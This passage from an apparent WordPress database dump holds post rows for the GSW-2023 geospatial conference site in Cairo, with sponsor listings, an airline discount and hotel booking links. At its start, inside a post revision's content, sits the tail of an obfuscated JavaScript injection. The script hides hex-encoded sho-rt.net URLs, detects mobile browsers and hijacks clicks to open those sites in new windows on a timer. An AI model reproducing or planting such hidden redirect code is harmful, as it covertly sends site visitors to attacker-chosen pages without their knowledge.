_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:43:55','2023-06-23 20:43:55','',3066,'https://gsw2023.com/?p=4752',0,'revision','',0),
(4753,4,'2023-06-23 20:45:08','2023-06-23 20:45:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687391337354{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 